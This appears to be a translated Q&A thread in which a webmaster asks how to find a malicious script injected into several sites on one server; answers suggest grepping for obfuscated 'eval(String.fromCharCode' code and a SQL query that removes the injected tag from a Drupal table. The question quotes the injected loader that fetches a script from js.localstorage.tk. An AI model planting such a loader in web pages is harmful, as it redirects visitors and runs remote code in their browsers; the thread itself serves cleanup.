1

从最近几天开始,我的网站遭到了恶意攻击。当我打开一个站点http://site1.com时,它首先会重定向到另一个页面(可能是广告页面)。

在 Chrome 浏览器中,当我尝试通过控制台(F12)诊断问题时,我发现它显示了一个奇怪的错误。“加载资源失败:net::ERR_NAME_NOT_RESOLVED”,网址为 - https://js.localstorage.tk/s.js?crt=new。在进一步调查中,我发现它会在该特定服务器上每个网站的每个页面加载中注入以下脚本。(不是一个站点而是 3-4 个站点在同一台服务器上受到了相同的攻击)。

var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://js.localstorage.tk/s.js?crt=new"; document.head.appendChild(z);

我还尝试使用以下各种“grep”命令在受感染网站的托管文件系统中找到此代码片段,但我找不到任何东西。

 grep -rwn /var/www/ -e 'js.localstorage.tk'
 grep -rwn /var/www/ -e 'var z'
 grep -rwn /var/www/ -e 'z.type'
 grep -rwn /var/www/ -e 'z.src'
 grep -rwn /var/www/ -e 'crt=new'

但没有恶意注入脚本的线索。数据库调查的结果相同。

当我在没有互联网的情况下通过 LAN 访问我的网站时,会出现同样的错误,并带有一些奇怪的 URL:

GET https://js.localstorage.tk/s.js?crt=new net::ERR_NAME_NOT_RESOLVED debugger:///VM359:1

最糟糕的是,现在谷歌已将我的网站列入“危险”列表,并显示带有深红色背景的警告“前面的欺骗性网站”。

任何帮助...!!!

4

2 回答 2

2

使用此命令查找代码

grep -rwn /var/www/ -e 'eval(String.fromCharCode'

于 2018-05-02T15:57:13.933 回答
1

你应该检查你的数据库。

我有同样的问题,并在 body_summary 列的 field_data_body 表的每一行中找到了脚本。

使用以下查询对所有表执行 a:%js.localstorage.tk%

这是一个删除查询:

UPDATE field_data_body SET `body_summary`=REPLACE(`body_summary`,"<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>","");
于 2018-05-04T02:12:22.080 回答